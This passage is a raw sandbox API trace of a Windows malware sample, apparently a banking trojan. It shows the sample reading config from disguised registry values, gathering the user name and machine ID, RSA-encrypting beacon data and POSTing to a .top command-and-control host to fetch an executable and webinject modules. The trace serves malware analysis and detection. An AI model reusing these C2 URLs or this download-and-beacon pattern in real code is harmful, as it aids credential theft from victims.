dwMilliseconds=0x0) returned 0x102 [0458.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52eb8c | out: phkResult=0x52eb8c*=0x18c) returned 0x0 [0458.172] RegQueryValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52ebb8, lpData=0x0, lpcbData=0x52eba0*=0x0 | out: lpType=0x52ebb8*=0x3, lpData=0x0, lpcbData=0x52eba0*=0x6f0) returned 0x0 [0458.172] RegQueryValueExW (in: hKey=0x18c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52ebb8, lpData=0x3d0dd0, lpcbData=0x52eba0*=0x6f0 | out: lpType=0x52ebb8*=0x3, lpData=0x3d0dd0*, lpcbData=0x52eba0*=0x6f0) returned 0x0 [0458.172] RegCloseKey (hKey=0x18c) returned 0x0 [0458.173] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52ec24 | out: phkResult=0x52ec24*=0x18c) returned 0x0 [0458.173] RegQueryValueExW (in: hKey=0x18c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52ec50, lpData=0x0, lpcbData=0x52ec38*=0x0 | out: lpType=0x52ec50*=0x3, lpData=0x0, lpcbData=0x52ec38*=0x6f0) returned 0x0 [0458.173] RegQueryValueExW (in: hKey=0x18c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52ec50, lpData=0x3d0dd0, lpcbData=0x52ec38*=0x6f0 | out: lpType=0x52ec50*=0x3, lpData=0x3d0dd0*, lpcbData=0x52ec38*=0x6f0) returned 0x0 [0458.173] RegCloseKey (hKey=0x18c) returned 0x0 [0458.175] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52ec38 | out: lpUrlComponents=0x52ec38) returned 1 [0458.226] GetSystemTime (in: lpSystemTime=0x52e8e8 | out: lpSystemTime=0x52e8e8*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x3b, wSecond=0x9, wMilliseconds=0x1d)) [0458.226] SystemTimeToFileTime (in: lpSystemTime=0x52e8e8, lpFileTime=0x52e8f8 | out: lpFileTime=0x52e8f8) returned 1 [0458.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0458.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3dce28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0458.227] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x52e970, nSize=0x52e91c | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x52e91c) returned 0x1 [0458.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0458.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x3d06c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YKYD69Q\\aETAdzjz", lpUsedDefaultChar=0x0) returned 16 [0458.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0458.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DA064951B33C749DEEA4F9B0A440E075", cchWideChar=32, lpMultiByteStr=0x44fdf0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DA064951B33C749DEEA4F9B0A440E075", lpUsedDefaultChar=0x0) returned 32 [0458.247] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52e86c | out: phkResult=0x52e86c*=0x288) returned 0x0 [0458.247] RegQueryValueExW (in: hKey=0x288, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52e898, lpData=0x0, lpcbData=0x52e880*=0x0 | out: lpType=0x52e898*=0x3, lpData=0x0, lpcbData=0x52e880*=0x6f0) returned 0x0 [0458.247] RegQueryValueExW (in: hKey=0x288, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52e898, lpData=0x3d0e10, lpcbData=0x52e880*=0x6f0 | out: lpType=0x52e898*=0x3, lpData=0x3d0e10*, lpcbData=0x52e880*=0x6f0) returned 0x0 [0458.247] RegCloseKey (hKey=0x288) returned 0x0 [0458.248] wvnsprintfW (in: pszDest=0x52e924, cchDest=10, pszFmt="%u.%u.%u", arglist=0x52e8fc | out: pszDest="2.6.1") returned 5 [0458.248] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0458.248] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x52eade, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x52e840, pcbStructInfo=0x52e824 | out: pvStructInfo=0x52e840, pcbStructInfo=0x52e824) returned 1 [0458.249] CryptImportPublicKeyInfo (in: hCryptProv=0x55e630, dwCertEncodingType=0x1, pInfo=0x575180*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5751b0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x5751b8*, PublicKey.cUnusedBits=0x0), phKey=0x52e830 | out: phKey=0x52e830*=0x568428) returned 1 [0458.250] LocalFree (hMem=0x575180) returned 0x0 [0458.250] wvnsprintfA (in: pszDest=0x3dc600, cchDest=21, pszFmt="%d", arglist=0x52e744 | out: pszDest="1515610749") returned 10 [0458.250] CryptEncrypt (in: hKey=0x568428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x52e690*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x52e690*=0x100) returned 1 [0458.250] CryptEncrypt (in: hKey=0x568428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x40d220*, pdwDataLen=0x52e6a4*=0x20, dwBufLen=0x100 | out: pbData=0x40d220*, pdwDataLen=0x52e6a4*=0x100) returned 1 [0458.250] CryptDestroyKey (hKey=0x568428) returned 1 [0458.250] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/1qesyozananrivoxityof.exe", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52e7a0 | out: lpUrlComponents=0x52e7a0) returned 1 [0458.250] wvnsprintfA (in: pszDest=0x40cf68, cchDest=516, pszFmt="%s%s", arglist=0x52e7d8 | out: pszDest="https://aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ") returned 53 [0458.250] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52e798 | out: lpUrlComponents=0x52e798) returned 1 [0458.250] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0458.250] InternetSetOptionA (hInternet=0xcc0010, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0458.250] InternetSetOptionA (hInternet=0xcc0010, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0458.250] InternetSetOptionA (hInternet=0xcc0010, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0458.250] InternetConnectA (hInternet=0xcc0010, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0014 [0458.251] HttpOpenRequestA (hConnect=0xcc0014, lpszVerb="POST", lpszObjectName="/MYXYt50L/l18RCMcJRNGj_aHp0/HXQOQ", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc0018 [0458.251] HttpSendRequestA (hRequest=0xcc0018, lpszHeaders="Connection: close\r\n_ æ@", dwHeadersLength=0x13, lpOptional=0x3d0e10, dwOptionalLength=0x300) returned 0 [0458.728] InternetQueryOptionA (in: hInternet=0xcc0018, dwOption=0x1f, lpBuffer=0x52e6bc, lpdwBufferLength=0x52e6c0 | out: lpBuffer=0x52e6bc, lpdwBufferLength=0x52e6c0) returned 1 [0458.728] InternetSetOptionA (hInternet=0xcc0018, dwOption=0x1f, lpBuffer=0x52e6bc, dwBufferLength=0x4) returned 1 [0458.728] HttpSendRequestA (in: hRequest=0xcc0018, lpszHeaders="Connection: close\r\n_ æ@", dwHeadersLength=0x13, lpOptional=0x3d0e10*, dwOptionalLength=0x300 | out: lpOptional=0x3d0e10*) returned 1 [0459.220] HttpQueryInfoA (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x52e6bc, lpdwBufferLength=0x52e6c0, lpdwIndex=0x0 | out: lpBuffer=0x52e6bc*, lpdwBufferLength=0x52e6c0*=0x4, lpdwIndex=0x0) returned 1 [0459.221] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.221] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x40fca0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52e7d0 | out: lpBuffer=0x40fca0*, lpdwNumberOfBytesRead=0x52e7d0*=0xc0) returned 1 [0459.221] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.221] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0x40fd60, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52e7d0 | out: lpBuffer=0x40fd60*, lpdwNumberOfBytesRead=0x52e7d0*=0x0) returned 1 [0459.222] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0459.222] InternetQueryOptionA (in: hInternet=0xcc0014, dwOption=0x15, lpBuffer=0x52e7cc, lpdwBufferLength=0x52e7c8 | out: lpBuffer=0x52e7cc, lpdwBufferLength=0x52e7c8) returned 1 [0459.222] InternetCloseHandle (hInternet=0xcc0014) returned 1 [0459.223] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0459.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52eb1c | out: phkResult=0x52eb1c*=0x4f4) returned 0x0 [0459.223] RegQueryValueExW (in: hKey=0x4f4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb48, lpData=0x0, lpcbData=0x52eb30*=0x0 | out: lpType=0x52eb48*=0x3, lpData=0x0, lpcbData=0x52eb30*=0x6f0) returned 0x0 [0459.223] RegQueryValueExW (in: hKey=0x4f4, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb48, lpData=0x40cf68, lpcbData=0x52eb30*=0x6f0 | out: lpType=0x52eb48*=0x3, lpData=0x40cf68*, lpcbData=0x52eb30*=0x6f0) returned 0x0 [0459.223] RegCloseKey (hKey=0x4f4) returned 0x0 [0459.223] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f49c | out: phkResult=0x52f49c*=0x4f4) returned 0x0 [0459.223] RegQueryValueExW (in: hKey=0x4f4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f4c8, lpData=0x0, lpcbData=0x52f4b0*=0x0 | out: lpType=0x52f4c8*=0x3, lpData=0x0, lpcbData=0x52f4b0*=0x6f0) returned 0x0 [0459.223] RegQueryValueExW (in: hKey=0x4f4, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f4c8, lpData=0x40cf68, lpcbData=0x52f4b0*=0x6f0 | out: lpType=0x52f4c8*=0x3, lpData=0x40cf68*, lpcbData=0x52f4b0*=0x6f0) returned 0x0 [0459.223] RegCloseKey (hKey=0x4f4) returned 0x0 [0459.223] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject32_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f4b0 | out: lpUrlComponents=0x52f4b0) returned 1 [0459.223] GetSystemTime (in: lpSystemTime=0x52f160 | out: lpSystemTime=0x52f160*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x3b, wSecond=0xa, wMilliseconds=0xc)) [0459.223] SystemTimeToFileTime (in: lpSystemTime=0x52f160, lpFileTime=0x52f170 | out: lpFileTime=0x52f170) returned 1 [0459.223] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x52f1e8, nSize=0x52f194 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x52f194) returned 0x1 [0459.224] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0459.224] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f0e4 | out: phkResult=0x52f0e4*=0x3bc) returned 0x0 [0459.224] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f110, lpData=0x0, lpcbData=0x52f0f8*=0x0 | out: lpType=0x52f110*=0x3, lpData=0x0, lpcbData=0x52f0f8*=0x6f0) returned 0x0 [0459.224] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f110, lpData=0x40cf68, lpcbData=0x52f0f8*=0x6f0 | out: lpType=0x52f110*=0x3, lpData=0x40cf68*, lpcbData=0x52f0f8*=0x6f0) returned 0x0 [0459.224] RegCloseKey (hKey=0x3bc) returned 0x0 [0459.224] wvnsprintfW (in: pszDest=0x52f19c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x52f174 | out: pszDest="2.6.1") returned 5 [0459.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0459.225] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x52f356, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x52f0b8, pcbStructInfo=0x52f09c | out: pvStructInfo=0x52f0b8, pcbStructInfo=0x52f09c) returned 1 [0459.225] CryptImportPublicKeyInfo (in: hCryptProv=0x55e630, dwCertEncodingType=0x1, pInfo=0x5d38c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5d38f0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x5d38f8*, PublicKey.cUnusedBits=0x0), phKey=0x52f0a8 | out: phKey=0x52f0a8*=0x57d1e0) returned 1 [0459.225] LocalFree (hMem=0x5d38c0) returned 0x0 [0459.225] wvnsprintfA (in: pszDest=0x40df30, cchDest=21, pszFmt="%d", arglist=0x52efbc | out: pszDest="1515610750") returned 10 [0459.225] CryptEncrypt (in: hKey=0x57d1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x52ef08*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x52ef08*=0x100) returned 1 [0459.225] CryptEncrypt (in: hKey=0x57d1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4104b8*, pdwDataLen=0x52ef1c*=0x20, dwBufLen=0x100 | out: pbData=0x4104b8*, pdwDataLen=0x52ef1c*=0x100) returned 1 [0459.225] CryptDestroyKey (hKey=0x57d1e0) returned 1 [0459.225] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject32_new.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f018 | out: lpUrlComponents=0x52f018) returned 1 [0459.225] wvnsprintfA (in: pszDest=0x3d0dd0, cchDest=516, pszFmt="%s%s", arglist=0x52f050 | out: pszDest="https://aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg") returned 60 [0459.225] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f010 | out: lpUrlComponents=0x52f010) returned 1 [0459.225] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0459.225] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0459.225] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0459.225] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0459.225] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0459.225] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/dnoLVKjaeD/vmgm/HeV3HvyL/4/J3ey/w/y/2Pg", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0459.225] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Connection: close\r\nd°é@", dwHeadersLength=0x13, lpOptional=0x40d1b8, dwOptionalLength=0x300) returned 0 [0459.428] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38 | out: lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38) returned 1 [0459.428] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x52ef34, dwBufferLength=0x4) returned 1 [0459.428] HttpSendRequestA (in: hRequest=0xcc000c, lpszHeaders="Connection: close\r\nd°é@", dwHeadersLength=0x13, lpOptional=0x40d1b8*, dwOptionalLength=0x300 | out: lpOptional=0x40d1b8*) returned 1 [0459.861] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x52ef34, lpdwBufferLength=0x52ef38, lpdwIndex=0x0 | out: lpBuffer=0x52ef34*, lpdwBufferLength=0x52ef38*=0x4, lpdwIndex=0x0) returned 1 [0459.861] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.862] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x41add0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52f048 | out: lpBuffer=0x41add0*, lpdwNumberOfBytesRead=0x52f048*=0xc0) returned 1 [0459.871] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0459.871] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x41ae90, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x52f048 | out: lpBuffer=0x41ae90*, lpdwNumberOfBytesRead=0x52f048*=0x0) returned 1 [0459.873] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0459.876] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x52f044, lpdwBufferLength=0x52f040 | out: lpBuffer=0x52f044, lpdwBufferLength=0x52f040) returned 1 [0459.876] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0459.876] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0459.876] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52eb1c | out: phkResult=0x52eb1c*=0x528) returned 0x0 [0459.877] RegQueryValueExW (in: hKey=0x528, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb48, lpData=0x0, lpcbData=0x52eb30*=0x0 | out: lpType=0x52eb48*=0x3, lpData=0x0, lpcbData=0x52eb30*=0x6f0) returned 0x0 [0459.877] RegQueryValueExW (in: hKey=0x528, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x52eb48, lpData=0x4124b8, lpcbData=0x52eb30*=0x6f0 | out: lpType=0x52eb48*=0x3, lpData=0x4124b8*, lpcbData=0x52eb30*=0x6f0) returned 0x0 [0459.877] RegCloseKey (hKey=0x528) returned 0x0 [0459.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f49c | out: phkResult=0x52f49c*=0x528) returned 0x0 [0459.878] RegQueryValueExW (in: hKey=0x528, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f4c8, lpData=0x0, lpcbData=0x52f4b0*=0x0 | out: lpType=0x52f4c8*=0x3, lpData=0x0, lpcbData=0x52f4b0*=0x6f0) returned 0x0 [0459.878] RegQueryValueExW (in: hKey=0x528, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f4c8, lpData=0x4124b8, lpcbData=0x52f4b0*=0x6f0 | out: lpType=0x52f4c8*=0x3, lpData=0x4124b8*, lpcbData=0x52f4b0*=0x6f0) returned 0x0 [0459.878] RegCloseKey (hKey=0x528) returned 0x0 [0459.878] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject64.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f4b0 | out: lpUrlComponents=0x52f4b0) returned 1 [0459.879] GetSystemTime (in: lpSystemTime=0x52f160 | out: lpSystemTime=0x52f160*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0x12, wMinute=0x3b, wSecond=0xa, wMilliseconds=0x29b)) [0459.879] SystemTimeToFileTime (in: lpSystemTime=0x52f160, lpFileTime=0x52f170 | out: lpFileTime=0x52f170) returned 1 [0459.879] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x52f1e8, nSize=0x52f194 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x52f194) returned 0x1 [0459.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YKYD69Q\\aETAdzjz", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0459.891] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x52f0e4 | out: phkResult=0x52f0e4*=0x3bc) returned 0x0 [0459.892] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f110, lpData=0x0, lpcbData=0x52f0f8*=0x0 | out: lpType=0x52f110*=0x3, lpData=0x0, lpcbData=0x52f0f8*=0x6f0) returned 0x0 [0459.892] RegQueryValueExW (in: hKey=0x3bc, lpValueName="Omegovna", lpReserved=0x0, lpType=0x52f110, lpData=0x4124b8, lpcbData=0x52f0f8*=0x6f0 | out: lpType=0x52f110*=0x3, lpData=0x4124b8*, lpcbData=0x52f0f8*=0x6f0) returned 0x0 [0459.892] RegCloseKey (hKey=0x3bc) returned 0x0 [0459.892] wvnsprintfW (in: pszDest=0x52f19c, cchDest=10, pszFmt="%u.%u.%u", arglist=0x52f174 | out: pszDest="2.6.1") returned 5 [0459.892] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="2.6.1", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0459.892] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x52f356, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x52f0b8, pcbStructInfo=0x52f09c | out: pvStructInfo=0x52f0b8, pcbStructInfo=0x52f09c) returned 1 [0459.892] CryptImportPublicKeyInfo (in: hCryptProv=0x55e630, dwCertEncodingType=0x1, pInfo=0x5bfaa0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5bfad0*, PublicKey.cbData=0x10d, PublicKey.pbData=0x5bfad8*, PublicKey.cUnusedBits=0x0), phKey=0x52f0a8 | out: phKey=0x52f0a8*=0x57d1e0) returned 1 [0459.892] LocalFree (hMem=0x5bfaa0) returned 0x0 [0459.892] wvnsprintfA (in: pszDest=0x40e110, cchDest=21, pszFmt="%d", arglist=0x52efbc | out: pszDest="1515610750") returned 10 [0459.893] CryptEncrypt (in: hKey=0x57d1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x52ef08*=0x20, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x52ef08*=0x100) returned 1 [0459.893] CryptEncrypt (in: hKey=0x57d1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4104b8*, pdwDataLen=0x52ef1c*=0x20, dwBufLen=0x100 | out: pbData=0x4104b8*, pdwDataLen=0x52ef1c*=0x100) returned 1 [0459.893] CryptDestroyKey (hKey=0x57d1e0) returned 1 [0459.893] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/webinject64.bin", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f018 | out: lpUrlComponents=0x52f018) returned 1 [0459.893] wvnsprintfA (in: pszDest=0x3d0dd0, cchDest=516, pszFmt="%s%s", arglist=0x52f050 | out: pszDest="https://aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/") returned 57 [0459.893] InternetCrackUrlA (in: lpszUrl="https://aaopsjdf.top/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x52f010 | out: lpUrlComponents=0x52f010) returned 1 [0459.893] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0459.893] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x84024, dwBufferLength=0x4) returned 1 [0459.893] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x8402c, dwBufferLength=0x4) returned 1 [0459.893] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x84034, dwBufferLength=0x4) returned 1 [0459.893] InternetConnectA (hInternet=0xcc0004, lpszServerName="aaopsjdf.top", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0459.894] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/dtSYRF8h/vnIaCOF/6TPWK0Krp9g/b/YH/Q/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x84000*="text/html", dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0459.894] HttpSendRequestA (hRequest=0xcc000c, 